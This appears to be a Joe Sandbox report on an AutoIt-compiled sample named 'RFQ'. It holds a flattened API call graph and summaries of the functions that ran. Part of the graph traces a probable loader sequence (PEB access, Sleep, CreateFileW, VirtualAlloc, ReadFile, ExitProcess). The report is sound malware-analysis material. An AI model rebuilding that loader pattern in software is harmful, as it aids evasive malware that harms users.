calls __onexit 88355->88415 88416 6a0178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 88355->88416 88359 6930b0 88358->88359 88360 692c76 88358->88360 88498 6a01c2 5 API calls __Init_thread_wait 88359->88498 88362 6d6f0c 88360->88362 88363 692c90 88360->88363 88503 706fc3 164 API calls 88362->88503 88418 693220 88363->88418 88365 6930ba 88369 68b606 22 API calls 88365->88369 88374 6930fb 88365->88374 88367 6d6f18 88367->88355 88379 6930d4 88369->88379 88370 693220 9 API calls 88371 692cb6 88370->88371 88373 692cec 88371->88373 88371->88374 88372 6d6f21 88372->88355 88375 6d6f31 88373->88375 88398 692d08 __fread_nolock 88373->88398 88374->88372 88500 68c5e7 23 API calls messages 88374->88500 88504 6f34ba 82 API calls __wsopen_s 88375->88504 88378 693139 88501 69d993 95 API calls 88378->88501 88499 6a0178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 88379->88499 88382 6d6f49 88505 6f34ba 82 API calls __wsopen_s 88382->88505 88383 692e2f 88385 6d6fac 88383->88385 88386 692e3c 88383->88386 88507 70566c 54 API calls _wcslen 88385->88507 88387 693220 9 API calls 88386->88387 88389 692e49 88387->88389 88394 693220 9 API calls 88389->88394 88404 692ec7 messages 88389->88404 88390 69fd5b 22 API calls 88390->88398 88391 69fd8b 22 API calls 88391->88398 88392 693172 88502 69fa6d 23 API calls 88392->88502 88393 69301d 88393->88355 88399 692e63 88394->88399 88397 692f7b messages 88397->88393 88497 69d593 22 API calls messages 88397->88497 88398->88378 88398->88382 88398->88383 88398->88390 88398->88391 88400 6d6f8d 88398->88400 88398->88404 88399->88404 88405 68c1c3 22 API calls 88399->88405 88506 6f34ba 82 API calls __wsopen_s 88400->88506 88401 693220 9 API calls 88401->88404 88404->88392 88404->88397 88404->88401 88407 687bee CloseHandle 88404->88407 88428 6ff013 88404->88428 88435 6f82f8 88404->88435 88438 7094b2 88404->88438 88441 6f7368 88404->88441 88508 6f34ba 82 API calls __wsopen_s 88404->88508 88405->88404 88407->88404 88411->88341 88412->88346 88413->88353 88414->88355 88415->88355 88416->88355 88417->88353 88419 693261 88418->88419 88421 69323d 88418->88421 88509 6a01c2 5 API calls __Init_thread_wait 88419->88509 88422 692ca0 88421->88422 88511 6a01c2 5 API calls __Init_thread_wait 88421->88511 88422->88370 88423 69326b 88423->88421 88510 6a0178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 88423->88510 88425 69a007 88425->88422 88512 6a0178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 88425->88512 88429 688e90 53 API calls 88428->88429 88430 6ff04d 88429->88430 88431 68b7e0 86 API calls 88430->88431 88432 6ff05d 88431->88432 88434 6ff086 88432->88434 88513 68b5c1 22 API calls 88432->88513 88434->88404 88514 6f9801 88435->88514 88437 6f8308 88437->88404 88577 707e80 88438->88577 88440 7094c2 88440->88404 88442 6f7392 88441->88442 88443 6f7387 88441->88443 88447 68c25d 22 API calls 88442->88447 88480 6f7472 88442->88480 88668 68ce67 39 API calls 88443->88668 88445 69fd5b 22 API calls 88446 6f74a5 88445->88446 88448 69fd8b 22 API calls 88446->88448 88449 6f73b3 88447->88449 88450 6f74b6 88448->88450 88451 68c25d 22 API calls 88449->88451 88453 687bee CloseHandle 88450->88453 88452 6f73bc 88451->88452 88454 688e90 53 API calls 88452->88454 88455 6f74c1 88453->88455 88456 6f73c8 88454->88456 88457 68c25d 22 API calls 88455->88457 88669 686bff 22 API calls 88456->88669 88459 6f74c9 88457->88459 88461 687bee CloseHandle 88459->88461 88460 6f73dd 88462 687cf8 22 API calls 88460->88462 88463 6f74d0 88461->88463 88464 6f7410 88462->88464 88465 688e90 53 API calls 88463->88465 88466 6f7468 88464->88466 88670 6ed3ec lstrlenW GetFileAttributesW FindFirstFileW FindClose 88464->88670 88467 6f74dc 88465->88467 88672 68ce67 39 API calls 88466->88672 88469 687bee CloseHandle 88467->88469 88472 6f74e6 88469->88472 88471 6f7420 88471->88466 88473 6f7424 88471->88473 88474 6870e5 5 API calls 88472->88474 88475 68b606 22 API calls 88473->88475 88476 6f7500 88474->88476 88477 6f7431 88475->88477 88478 6f75fc GetLastError 88476->88478 88479 6f7508 88476->88479 88671 6ed1df 26 API calls 88477->88671 88482 6f7615 88478->88482 88673 686d7e 27 API calls messages 88479->88673 88480->88445 88495 6f75c2 88480->88495 88676 687bbe CloseHandle messages 88482->88676 88483 6f743a 88483->88466 88486 6f7516 88674 686d67 SetFilePointerEx SetFilePointerEx SetFilePointerEx 88486->88674 88488 6f7563 88489 69fd5b 22 API calls 88488->88489 88491 6f7597 88489->88491 88490 6f751d 88490->88488 88492 6ecc1d 4 API calls 88490->88492 88493 68c25d 22 API calls 88491->88493 88492->88488 88494 6f75a4 88493->88494 88494->88495 88675 6e40c5 22 API calls __fread_nolock 88494->88675 88495->88404 88497->88397 88498->88365 88499->88374 88500->88378 88501->88392 88502->88392 88503->88367 88504->88404 88505->88404 88506->88404 88507->88399 88508->88404 88509->88423 88510->88421 88511->88425 88512->88422 88513->88434 88515 6f9906 88514->88515 88516 6f9820 88514->88516 88572 6f9bc8 39 API calls 88515->88572 88518 69fd5b 22 API calls 88516->88518 88519 6f9827 88518->88519 88520 69fd8b 22 API calls 88519->88520 88521 6f9838 88520->88521 88523 687bee CloseHandle 88521->88523 88522 6f99e3 88565 6f1db4 88522->88565 88525 6f9843 88523->88525 88529 68c25d 22 API calls 88525->88529 88526 6f98e8 88526->88437 88527 6f99ea 88535 6ecc1d 4 API calls 88527->88535 88528 6f98c0 88528->88522 88528->88526 88530 6f9951 88528->88530 88531 6f984b 88529->88531 88533 688e90 53 API calls 88530->88533 88532 687bee CloseHandle 88531->88532 88534 6f9852 88532->88534 88543 6f9958 88533->88543 88536 688e90 53 API calls 88534->88536 88559 6f99c6 88535->88559 88539 6f985e 88536->88539 88537 6f99d9 88574 6ecc75 30 API calls 88537->88574 88541 687bee CloseHandle 88539->88541 88540 6f998c 88542 687c18 22 API calls 88540->88542 88545 6f9868 88541->88545 88546 6f999c 88542->88546 88543->88537 88543->88540 88544 687bee CloseHandle 88547 6f9a3c 88544->88547 88548 6870e5 5 API calls 88545->88548 88549 6f99ac 88546->88549 88552 68c1c3 22 API calls 88546->88552 88575 687bbe CloseHandle messages 88547->88575 88551 6f9877 88548->88551 88553 6852b7 22 API calls 88549->88553 88554 6f987b 88551->88554 88555 6f98e0 88551->88555 88552->88549 88556 6f99ba 88553->88556 88569 686d7e 27 API calls messages 88554->88569 88571 687bbe CloseHandle messages 88555->88571 88573 6ecc75 30 API calls 88556->88573 88559->88526 88559->88544 88561 6f9889 88570 686d67 SetFilePointerEx SetFilePointerEx SetFilePointerEx 88561->88570 88563 6f9890 88563->88528 88564 6ecc1d 4 API calls 88563->88564 88564->88528 88566 6f1dbd 88565->88566 88567 6f1dc2 88565->88567 88576 6f0e85 24 API calls __fread_nolock 88566->88576 88567->88527 88569->88561 88570->88563 88571->88526 88572->88528 88573->88559 88574->88559 88575->88526 88576->88567 88578 688e90 53 API calls 88577->88578 88579 707eb7 88578->88579 88601 707efc messages 88579->88601 88615 708bfa 88579->88615 88581 7081a8 88582 708376 88581->88582 88588 7081b6 88581->88588 88654 708e0b 60 API calls 88582->88654 88585 708385 88587 708391 88585->88587 88585->88588 88586 688e90 53 API calls 88605 707f70 88586->88605 88587->88601 88628 707dad 88588->88628 88593 7081ef 88643 69fbf0 88593->88643 88596 708229 88599 687d93 22 API calls 88596->88599 88597 70820f 88649 6f34ba 82 API calls __wsopen_s 88597->88649 88602 708238 88599->88602 88600 70821a GetCurrentProcess TerminateProcess 88600->88596 88601->88440 88603 6883e0 22 API calls 88602->88603 88604 708251 88603->88604 88613 708279 88604->88613 88650 691df0 22 API calls 88604->88650 88605->88581 88605->88586 88605->88601 88647 6e40c5 22 API calls __fread_nolock 88605->88647 88648 708444 42 API calls _strftime 88605->88648 88606 7083ec 88606->88601 88611 708400 FreeLibrary 88606->88611 88608 708268 88651 708aa2 75 API calls 88608->88651 88611->88601 88613->88606 88652 691df0 22 API calls 88613->88652 88653 68c5e7 23 API calls messages 88613->88653 88655 708aa2 75 API calls 88613->88655 88616 68c7c9 22 API calls 88615->88616 88617 708c15 CharLowerBuffW 88616->88617 88656 6e8daa 88617->88656 88621 68c25d 22 API calls 88622 708c51 88621->88622 88663 6886ac 22 API calls __fread_nolock 88622->88663 88624 708c65 88625 68ad22 22 API calls 88624->88625 88627 708c6f _wcslen 88625->88627 88626 708d85 _wcslen 88626->88605 88627->88626 88664 708444 42 API calls _strftime 88627->88664 88629 707dc8 88628->88629 88630 707e13 88628->88630 88631 69fd8b 22 API calls 88629->88631 88634 708fbd 88630->88634 88632 707dea 88631->88632 88632->88630 88633 69fd5b 22 API calls 88632->88633 88633->88632 88635 7091d2 messages 88634->88635 88642 708fe1 _strcat _wcslen 88634->88642 88635->88593 88636 68ce67 39 API calls 88636->88642 88637 68cc8f 39 API calls 88637->88642 88638 68cfb5 39 API calls 88638->88642 88639 688e90 53 API calls 88639->88642 88640 6ae99c 21 API calls ___std_exception_copy 88640->88642 88642->88635 88642->88636 88642->88637 88642->88638 88642->88639 88642->88640 88667 6eeecc 24 API calls _wcslen 88642->88667 88644 69fc05 88643->88644 88645 69fc9d VirtualProtect 88644->88645 88646 69fc6b 88644->88646 88645->88646 88646->88596 88646->88597 88647->88605 88648->88605 88649->88600 88650->88608 88651->88613 88652->88613 88653->88613 88654->88585 88655->88613 88657 6e8dca _wcslen 88656->88657 88658 6e8eb9 88657->88658 88660 6e8ebe 88657->88660 88662 6e8dff 88657->88662 88658->88621 88658->88627 88660->88658 88666 69d5dc 41 API calls 88660->88666 88662->88658 88665 69d5dc 41 API calls 88662->88665 88663->88624 88664->88626 88665->88662 88666->88660 88667->88642 88668->88442 88669->88460 88670->88471 88671->88483 88672->88480 88673->88486 88674->88490 88675->88495 88676->88495 88677 6d35db 88680 68f0b0 messages 88677->88680 88678 68f2d5 88679 68f107 GetInputState 88679->88680 88680->88678 88680->88679 88682 68f650 88680->88682 88683 68f66f 88682->88683 88684 68f683 88682->88684 88689 68eb60 164 API calls 2 library calls 88683->88689 88690 6f34ba 82 API calls __wsopen_s 88684->88690 88686 68f67a 88686->88680 88688 6d3b50 88688->88688 88689->88686 88690->88688 88691 6b83a2 88696 6b815e 88691->88696 88694 6b83ca 88701 6b818f try_get_first_available_module 88696->88701 88698 6b838e 88715 6b277c 26 API calls pre_c_initialization 88698->88715 88700 6b82e3 88700->88694 88708 6c0925 88700->88708 88704 6b82d8 88701->88704 88711 6a8d9b 40 API calls 2 library calls 88701->88711 88703 6b832c 88703->88704 88712 6a8d9b 40 API calls 2 library calls 88703->88712 88704->88700 88714 6af269 20 API calls _abort 88704->88714 88706 6b834b 88706->88704 88713 6a8d9b 40 API calls 2 library calls 88706->88713 88716 6c0022 88708->88716 88710 6c0940 88710->88694 88711->88703 88712->88706 88713->88704 88714->88698 88715->88700 88717 6c002e ___BuildCatchObject 88716->88717 88718 6c003c 88717->88718 88721 6c0075 88717->88721 88773 6af269 20 API calls _abort 88718->88773 88720 6c0041 88774 6b277c 26 API calls pre_c_initialization 88720->88774 88727 6c05fc 88721->88727 88726 6c004b __wsopen_s 88726->88710 88728 6c0619 88727->88728 88729 6c062e 88728->88729 88730 6c0647 88728->88730 88790 6af256 20 API calls _abort 88729->88790 88776 6b51b1 88730->88776 88733 6c064c 88734 6c066c 88733->88734 88735 6c0655 88733->88735 88789 6c033b CreateFileW 88734->88789 88792 6af256 20 API calls _abort 88735->88792 88739 6c065a 88793 6af269 20 API calls _abort 88739->88793 88741 6c0722 GetFileType 88742 6c072d GetLastError 88741->88742 88743 6c0774 88741->88743 88796 6af233 20 API calls 2 library calls 88742->88796 88798 6b50fa 21 API calls 3 library calls 88743->88798 88744 6c06f7 GetLastError 88795 6af233 20 API calls 2 library calls 88744->88795 88745 6c06a5 88745->88741 88745->88744 88794 6c033b CreateFileW 88745->88794 88749 6c0633 88791 6af269 20 API calls _abort 88749->88791 88750 6c073b CloseHandle 88750->88749 88753 6c0764 88750->88753 88752 6c06ea 88752->88741 88752->88744 88797 6af269 20 API calls _abort 88753->88797 88754 6c0795 88756 6c07e1 88754->88756 88799 6c054c 72 API calls 4 library calls 88754->88799 88761 6c080e 88756->88761 88800 6c00ee 72 API calls 4 library calls 88756->88800 88757 6c0769 88757->88749 88760 6c0807 88760->88761 88762 6c081f 88760->88762 88801 6b864e 88761->88801 88764 6c0099 88762->88764 88765 6c089d CloseHandle 88762->88765 88775 6c00c2 LeaveCriticalSection __wsopen_s 88764->88775 88816 6c033b CreateFileW 88765->88816 88767 6c08c8 88768 6c08fe 88767->88768 88769 6c08d2 GetLastError 88767->88769 88768->88764 88817 6af233 20 API calls 2 library calls 88769->88817 88771 6c08de 88818 6b52c3 21 API calls 3 library calls 88771->88818 88773->88720 88774->88726 88775->88726 88777 6b51bd ___BuildCatchObject 88776->88777 88819 6b2eee EnterCriticalSection 88777->88819 88779 6b51c4 88781 6b51e9 88779->88781 88784 6b5257 EnterCriticalSection 88779->88784 88786 6b520b 88779->88786 88823 6b4f90 21 API calls 3 library calls 88781->88823 88783 6b5234 __wsopen_s 88783->88733 88784->88786 88787 6b5264 LeaveCriticalSection 88784->88787 88785 6b51ee 88785->88786 88824 6b50d7 EnterCriticalSection 88785->88824 88820 6b52ba 88786->88820 88787->88779 88789->88745 88790->88749 88791->88764 88792->88739 88793->88749 88794->88752 88795->88749 88796->88750 88797->88757 88798->88754 88799->88756 88800->88760 88826 6b5354 88801->88826 88803 6b8664 88839 6b52c3 21 API calls 3 library calls 88803->88839 88805 6b865e 88805->88803 88807 6b5354 __wsopen_s 26 API calls 88805->88807 88815 6b8696 88805->88815 88806 6b86bc 88810 6b86de 88806->88810 88840 6af233 20 API calls 2 library calls 88806->88840 88811 6b868d 88807->88811 88808 6b5354 __wsopen_s 26 API calls 88809 6b86a2 CloseHandle 88808->88809 88809->88803 88812 6b86ae GetLastError 88809->88812 88810->88764 88814 6b5354 __wsopen_s 26 API calls 88811->88814 88812->88803 88814->88815 88815->88803 88815->88808 88816->88767 88817->88771 88818->88768 88819->88779 88825 6b2f36 LeaveCriticalSection 88820->88825 88822 6b52c1 88822->88783 88823->88785 88824->88786 88825->88822 88827 6b5361 88826->88827 88828 6b5376 88826->88828 88841 6af256 20 API calls _abort 88827->88841 88833 6b539b 88828->88833 88843 6af256 20 API calls _abort 88828->88843 88830 6b5366 88842 6af269 20 API calls _abort 88830->88842 88833->88805 88834 6b53a6 88844 6af269 20 API calls _abort 88834->88844 88835 6b536e 88835->88805 88837 6b53ae 88845 6b277c 26 API calls pre_c_initialization 88837->88845 88839->88806 88840->88810 88841->88830 88842->88835 88843->88834 88844->88837 88845->88835 88846 684b81 88849 684b9b 88846->88849 88850 684bb2 88849->88850 88851 684c16 88850->88851 88852 684bb7 88850->88852 88890 684c14 88850->88890 88854 6c39dd 88851->88854 88855 684c1c 88851->88855 88856 684c90 PostQuitMessage 88852->88856 88857 684bc4 88852->88857 88853 684bfb DefWindowProcW 88863 684b95 88853->88863 88898 6831ed 10 API calls 88854->88898 88858 684c48 SetTimer RegisterWindowMessageW 88855->88858 88859 684c23 88855->88859 88856->88863 88861 6c3a5e 88857->88861 88862 684bcf 88857->88862 88858->88863 88867 684c71 CreatePopupMenu 88858->88867 88864 6c397e 88859->88864 88865 684c2c KillTimer 88859->88865 88903 6ebe4e 34 API calls ___scrt_fastfail 88861->88903 88868 684bd9 88862->88868 88869 6c3a4a 88862->88869 88871 6c39b9 MoveWindow 88864->88871 88872 6c3983 88864->88872 88894 684b1d Shell_NotifyIconW ___scrt_fastfail 88865->88894 88866 6c39fe 88899 69e48c 42 API calls 88866->88899 88867->88863 88876 6c3a2f 88868->88876 88877 684be4 88868->88877 88902 6ec07f 27 API calls ___scrt_fastfail 88869->88902 88871->88863 88879 6c39a8 SetFocus 88872->88879 88880 6c3989 88872->88880 88876->88853 88901 6e0a1b 22 API calls 88876->88901 88883 684bef 88877->88883 88884 684c7e 88877->88884 88878 6c3a70 88878->88853 88878->88863 88879->88863 88880->88883 88885 6c3992 88880->88885 88881 684c3f 88895 685adb DeleteObject DestroyWindow 88881->88895 88882 684c8e 88882->88863 88883->88853 88900 684b1d Shell_NotifyIconW ___scrt_fastfail 88883->88900 88896 684c9a 44 API calls ___scrt_fastfail 88884->88896 88897 6831ed 10 API calls 88885->88897 88890->88853 88892 6c3a23 88893 6856c2 49 API calls 88892->88893 88893->88890 88894->88881 88895->88863 88896->88882 88897->88863 88898->88866 88899->88883 88900->88892 88901->88890 88902->88882 88903->88878 88904 1717488 88918 17150d8 88904->88918 88906 1717581 88921 1717378 88906->88921 88908 17175aa CreateFileW 88910 17175fe 88908->88910 88911 17175f9 88908->88911 88910->88911 88912 1717615 VirtualAlloc 88910->88912 88912->88911 88913 1717633 ReadFile 88912->88913 88913->88911 88914 171764e 88913->88914 88915 1716378 13 API calls 88914->88915 88916 1717681 88915->88916 88917 17176a4 ExitProcess 88916->88917 88917->88911 88924 17185a8 GetPEB 88918->88924 88920 1715763 88920->88906 88922 1717381 Sleep 88921->88922 88923 171738f 88922->88923 88925 17185d2 88924->88925 88925->88920 88926 681033 88931 686633 88926->88931 88930 681042 88932 68c25d 22 API calls 88931->88932 88933 6866a1 88932->88933 88939 68597b 88933->88939 88935 68673e 88936 681038 88935->88936 88942 686b97 22 API calls __fread_nolock 88935->88942 88938 6a0023 29 API calls __onexit 88936->88938 88938->88930 88943 6859a7 88939->88943 88942->88935 88944 68599a 88943->88944 88945 6859b4 88943->88945 88944->88935 88945->88944 88946 6859bb RegOpenKeyExW 88945->88946 88946->88944 88947 6859d5 RegQueryValueExW 88946->88947 88948 685a0b RegCloseKey 88947->88948 88949 6859f6 88947->88949 88948->88944 88949->88948 88950 681044 88955 6829fe 88950->88955 88952 68104a 88991 6a0023 29 API calls __onexit 88952->88991 88954 681054 88992 682ca3 88955->88992 88959 682a75 88960 68c25d 22 API calls 88959->88960 88961 682a7f 88960->88961 88962 68c25d 22 API calls 88961->88962 88963 682a89 88962->88963 88964 68c25d 22 API calls 88963->88964 88965 682a93 88964->88965 88966 68c25d 22 API calls 88965->88966 88967 682ad1 88966->88967 88968 68c25d 22 API calls 88967->88968 88969 682b9d 88968->88969 89002 683027 88969->89002 88973 682bcf 88974 68c25d 22 API calls 88973->88974 88975 682bd9 88974->88975 88976 693220 9 API calls 88975->88976 88977 682c04 88976->88977 89023 6833b6 88977->89023 88979 682c20 88980 682c30 GetStdHandle 88979->88980 88981 6c3011 88980->88981 88982 682c85 88980->88982 88981->88982 88983 6c301a 88981->88983 88985 682c92 OleInitialize 88982->88985 88984 69fd5b 22 API calls 88983->88984 88986 6c3021 88984->88986 88985->88952 89030 6f003b InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 88986->89030 88988 6c302a 89031 6f0862 CreateThread 88988->89031 88990 6c3036 CloseHandle 88990->88982 88991->88954 89032 682cfc 88992->89032 88995 682cfc 22 API calls 88996 682cdb 88995->88996 88997 68c25d 22 API calls 88996->88997 88998 682ce7 88997->88998 88999 6884e7 22 API calls 88998->88999 89000 682a34 88999->89000 89001 6834ce 6 API calls 89000->89001 89001->88959 89003 68c25d 22 API calls 89002->89003 89004 683037 89003->89004 89005 68c25d 22 API calls 89004->89005 89006 68303f 89005->89006 89007 68c25d 22 API calls 89006->89007 89008 68305a 89007->89008 89009 69fd5b 22 API calls 89008->89009 89010 682ba7 89009->89010 89011 683455 89010->89011 89012 683463 89011->89012 89013 68c25d 22 API calls 89012->89013 89014 68346e 89013->89014 89015 68c25d 22 API calls 89014->89015 89016 683479 89015->89016 89017 68c25d 22 API calls 89016->89017 89018 683484 89017->89018 89019 68c25d 22 API calls 89018->89019 89020 68348f 89019->89020 89021 69fd5b 22 API calls 89020->89021 89022 6834a1 RegisterWindowMessageW 89021->89022 89022->88973 89024 6c32b9 89023->89024 89025 6833c6 89023->89025 89039 6f3127 23 API calls 89024->89039 89026 69fd5b 22 API calls 89025->89026 89028 6833ce 89026->89028 89028->88979 89029 6c32c4 89030->88988 89031->88990 89040 6f0848 28 API calls 89031->89040 89033 68c25d 22 API calls 89032->89033 89034 682d07 89033->89034 89035 68c25d 22 API calls 89034->89035 89036 682d0f 89035->89036 89037 68c25d 22 API calls 89036->89037 89038 682cd1 89037->89038 89038->88995 89039->89029 89041 68f7e5 89044 68d010 89041->89044 89045 68d02b 89044->89045 89046 6d0d21 89045->89046 89047 6d0cd3 89045->89047 89072 68d050 89045->89072 89082 7057c9 94 API calls 2 library calls 89046->89082 89050 6d0cdd 89047->89050 89053 6d0cea 89047->89053 89047->89072 89080 705c5a 94 API calls 89050->89080 89069 68d320 89053->89069 89081 7060f7 94 API calls 2 library calls 89053->89081 89057 68d4e0 40 API calls 89057->89072 89058 6d0fb4 89058->89058 89061 6d0efd 89085 705b33 82 API calls 89061->89085 89064 68c117 41 API calls 89064->89072 89065 68d34e 89068 69dab2 40 API calls 89068->89072 89069->89065 89086 6f34ba 82 API calls __wsopen_s 89069->89086 89070 68c1c3 22 API calls 89070->89072 89072->89057 89072->89061 89072->89064 89072->89065 89072->89068 89072->89069 89072->89070 89073 69da6c 40 API calls 89072->89073 89074 6a01c2 5 API calls __Init_thread_wait 89072->89074 89075 6813dc 22 API calls 89072->89075 89076 6a0023 29 API calls __onexit 89072->89076 89077 6a0178 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 89072->89077 89078 69ec9e 82 API calls 89072->89078 89079 69e596 83 API calls 89072->89079 89083 68c5e7 23 API calls messages 89072->89083 89084 6df5a8 23 API calls 89072->89084 89073->89072 89074->89072 89075->89072 89076->89072 89077->89072 89078->89072 89079->89072 89080->89053 89081->89069 89082->89072 89083->89072 89084->89072 89085->89069 89086->89058

                                                                            Executed Functions

                                                                            Function 0068615E Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 68615e-6861cd call 68c25d GetVersionExW call 6884e7 5 6c434e-6c4361 0->5 6 6861d3 0->6 8 6c4362-6c4366 5->8 7 6861d5-6861d7 6->7 9 6c438d 7->9 10 6861dd-68623c call 68ad22 call 68562b 7->10 11 6c4368 8->11 12 6c4369-6c4375 8->12 16 6c4394-6c4397 9->16 29 6c4516-6c451d 10->29 30 686242-686244 10->30 11->12 12->8 13 6c4377-6c4379 12->13 13->7 15 6c437f-6c4386 13->15 15->5 18 6c4388 15->18 19 6c439d-6c43df 16->19 20 68629b-6862b5 GetCurrentProcess IsWow64Process 16->20 18->9 19->20 24 6c43e5-6c43e8 19->24 22 686314-68631a 20->22 23 6862b7 20->23 26 6862bd-6862c9 22->26 23->26 27 6c43ea-6c43f4 24->27 28 6c4412-6c441c 24->28 31 6c455b-6c455f GetSystemInfo 26->31 32 6862cf-6862de LoadLibraryA 26->32 33 6c43f6-6c43fc 27->33 34 6c4401-6c440d 27->34 36 6c441e-6c442a 28->36 37 6c442f-6c4439 28->37 38 6c453d-6c4540 29->38 39 6c451f 29->39 30->16 35 68624a-68625d 30->35 44 68631c-686326 GetSystemInfo 32->44 45 6862e0-6862ee GetProcAddress 32->45 33->20 34->20 46 6c445d-6c4466 35->46 47 686263-686265 35->47 36->20 40 6c444c-6c4458 37->40 41 6c443b-6c4447 37->41 42 6c452b-6c4533 38->42 43 6c4542-6c4551 38->43 48 6c4525 39->48 40->20 41->20 42->38 43->48 51 6c4553-6c4559 43->51 53 6862f6-6862f8 44->53 45->44 52 6862f0-6862f4 GetNativeSystemInfo 45->52 49 6c4468-6c446e 46->49 50 6c4473-6c447f 46->50 54 68626b-68626e 47->54 55 6c4484-6c4499 47->55 48->42 49->20 50->20 51->42 52->53 60 6862fa-6862fb FreeLibrary 53->60 61 686301-686313 53->61 56 6c44c8-6c44cb 54->56 57 686274-68628f 54->57 58 6c449b-6c44a1 55->58 59 6c44a6-6c44b2 55->59 56->20 64 6c44d1-6c44f8 56->64 62 6c44b7-6c44c3 57->62 63 686295 57->63 58->20 59->20 60->61 62->20 63->20 65 6c44fa-6c4500 64->65 66 6c4505-6c4511 64->66 65->20 66->20
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 0068618D
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • GetCurrentProcess.KERNEL32(?,0071D030,00000000,?,?), ref: 006862A2
                                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 006862A9
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006862D4
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006862E6
                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006862F4
                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 006862FB
                                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00686320
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                            • API String ID: 3290436268-3101561225
                                                                            • Opcode ID: 744398dd600a7919d4bf62904a73b2ad72015f35804b31ecff344d9e29c892a3
                                                                            • Instruction ID: 0e23098abf80c58df11654437a19d0733db3f2d19d02d040a60a24a17475f9f6
                                                                            • Opcode Fuzzy Hash: 744398dd600a7919d4bf62904a73b2ad72015f35804b31ecff344d9e29c892a3
                                                                            • Instruction Fuzzy Hash: E3A1C6218093C0CFC711D7A9BC747E53FE6AF6634BB88D9DDE04193662D6AC4909CB29
                                                                            Function 0068445D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,006836D8,?), ref: 0068448D
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,006836D8,?), ref: 006844A0
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00751418,00751400,?,?,?,?,?,?,006836D8,?), ref: 00684515
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                              • Part of subcall function 006836FB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,0068453D,00751418,?,?,?,?,?,?,?,006836D8,?), ref: 0068373C
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,00751418,?,?,?,?,?,?,?,006836D8,?), ref: 00684596
                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007459B8,00000010), ref: 006C371C
                                                                            • SetCurrentDirectoryW.KERNEL32(?,00751418,?,?,?,?,?,?,?,006836D8,?), ref: 006C3769
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00742244,00751418,?,?,?,?,?,?,?,006836D8), ref: 006C37F2
                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 006C37F9
                                                                              • Part of subcall function 006845AE: GetSysColorBrush.USER32(0000000F), ref: 006845B9
                                                                              • Part of subcall function 006845AE: LoadCursorW.USER32(00000000,00007F00), ref: 006845C8
                                                                              • Part of subcall function 006845AE: LoadIconW.USER32(00000063), ref: 006845DE
                                                                              • Part of subcall function 006845AE: LoadIconW.USER32(000000A4), ref: 006845F0
                                                                              • Part of subcall function 006845AE: LoadIconW.USER32(000000A2), ref: 00684602
                                                                              • Part of subcall function 006845AE: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0068461A
                                                                              • Part of subcall function 006845AE: RegisterClassExW.USER32(?), ref: 0068466B
                                                                              • Part of subcall function 0068468E: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006846BC
                                                                              • Part of subcall function 0068468E: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006846DD
                                                                              • Part of subcall function 0068468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,006836D8,?), ref: 006846F1
                                                                              • Part of subcall function 0068468E: ShowWindow.USER32(00000000,?,?,?,?,?,?,006836D8,?), ref: 006846FA
                                                                              • Part of subcall function 006856C2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00685793
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
